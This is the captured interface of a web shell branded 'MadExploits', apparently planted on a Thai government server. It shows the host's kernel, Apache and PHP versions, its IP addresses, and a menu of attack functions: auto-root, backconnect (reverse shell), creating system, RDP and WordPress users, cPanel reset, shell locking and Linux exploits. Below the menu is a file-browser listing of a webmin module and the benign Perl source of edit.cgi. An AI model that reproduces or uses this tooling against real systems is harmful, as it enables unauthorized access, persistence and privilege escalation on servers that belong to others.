Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
mailcap /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
252
B
-rw-r--r--
backup_config.pl
585
B
-rwxr-xr-x
cgi_args.pl
193
B
-rwxr-xr-x
config
21
B
-rw-r--r--
config.info
34
B
-rw-r--r--
config.info.ca
44
B
-rw-r--r--
config.info.ca.UTF-8
44
B
-rw-r--r--
config.info.de
34
B
-rw-r--r--
config.info.de.UTF-8
34
B
-rw-r--r--
config.info.hu
0
B
-rw-r--r--
config.info.ja_JP.UTF-8
45
B
-rw-r--r--
config.info.ko_KR.UTF-8
42
B
-rw-r--r--
config.info.ko_KR.euc
34
B
-rw-r--r--
config.info.ms_MY
34
B
-rw-r--r--
config.info.ms_MY.UTF-8
34
B
-rw-r--r--
config.info.nl
35
B
-rw-r--r--
config.info.nl.UTF-8
35
B
-rw-r--r--
config.info.no
38
B
-rw-r--r--
config.info.no.UTF-8
38
B
-rw-r--r--
config.info.pl
36
B
-rw-r--r--
config.info.pl.UTF-8
38
B
-rw-r--r--
delete.cgi
1.03
KB
-rwxr-xr-x
edit.cgi
2
KB
-rwxr-xr-x
index.cgi
1.23
KB
-rwxr-xr-x
log_parser.pl
527
B
-rwxr-xr-x
mailcap-lib.pl
3.85
KB
-rwxr-xr-x
module.info
167
B
-rw-r--r--
module.info.ca
128
B
-rw-r--r--
module.info.ca.UTF-8
140
B
-rw-r--r--
module.info.cz
27
B
-rw-r--r--
module.info.cz.UTF-8
33
B
-rw-r--r--
module.info.de
120
B
-rw-r--r--
module.info.de.UTF-8
132
B
-rw-r--r--
module.info.hu
30
B
-rw-r--r--
module.info.hu.UTF-8
38
B
-rw-r--r--
module.info.ko_KR.UTF-8
42
B
-rw-r--r--
module.info.ko_KR.euc
34
B
-rw-r--r--
module.info.ms_MY
124
B
-rw-r--r--
module.info.ms_MY.UTF-8
136
B
-rw-r--r--
module.info.nl
30
B
-rw-r--r--
module.info.nl.UTF-8
36
B
-rw-r--r--
module.info.no
29
B
-rw-r--r--
module.info.no.UTF-8
35
B
-rw-r--r--
module.info.pl
123
B
-rw-r--r--
module.info.pl.UTF-8
141
B
-rw-r--r--
save.cgi
1.89
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit.cgi
#!/usr/bin/perl # Show a form for editing or creating a mailcap entry require './mailcap-lib.pl'; &ReadParse(); if ($in{'new'}) { &ui_print_header(undef, $text{'edit_title1'}, ""); $mailcap = { 'enabled' => 1 }; } else { &ui_print_header(undef, $text{'edit_title2'}, ""); @mailcap = &list_mailcap(); ($mailcap) = grep { $_->{'index'} == $in{'index'} } @mailcap; $mailcap || &error($text{'edit_egone'}); } $args = $mailcap->{'args'}; # Form header print &ui_form_start("save.cgi", "post"); print &ui_hidden("new", $in{'new'}),"\n"; print &ui_hidden("index", $in{'index'}),"\n"; print &ui_table_start($text{'edit_header'}, "width=100%", 2); # MIME type, program and description fields print &ui_table_row($text{'edit_type'}, &ui_textbox("type", $mailcap->{'type'}, 30)); print &ui_table_row($text{'edit_enabled'}, &ui_yesno_radio("enabled", int($mailcap->{'enabled'}))); print &ui_table_row($text{'edit_program'}, &ui_textbox("program", $mailcap->{'program'}, 70)); if ($mailcap->{'cmt'} =~ /\n/) { # Multi-line comment from file comments print &ui_table_row($text{'edit_cmt'}, &ui_textarea("cmt", $mailcap->{'cmt'}, 3, 70, "off")); } else { # Single line comment from file comment print &ui_table_row($text{'edit_cmt'}, &ui_textbox("cmt", $mailcap->{'cmt'}, 70)); } # Other options print &ui_table_hr(); print &ui_table_row($text{'edit_test'}, &ui_opt_textbox("test", $args->{'test'}, 50, $text{'edit_none'})); print &ui_table_row($text{'edit_term'}, &ui_yesno_radio("term", defined($args->{'needsterminal'}) ? 1 : 0)); print &ui_table_row($text{'edit_copious'}, &ui_yesno_radio("copious", defined($args->{'copiousoutput'}) ? 1 : 0)); print &ui_table_row($text{'edit_desc'}, &ui_opt_textbox("desc", $args->{'description'}, 50, $text{'edit_none'})); # Form footer print &ui_table_end(); print &ui_form_end([ $in{'new'} ? ( [ "create", $text{'create'} ] ) : ( [ "save", $text{'save'} ], [ "delete", $text{'delete'} ] ) ]); &ui_print_footer("", $text{'index_return'});
Close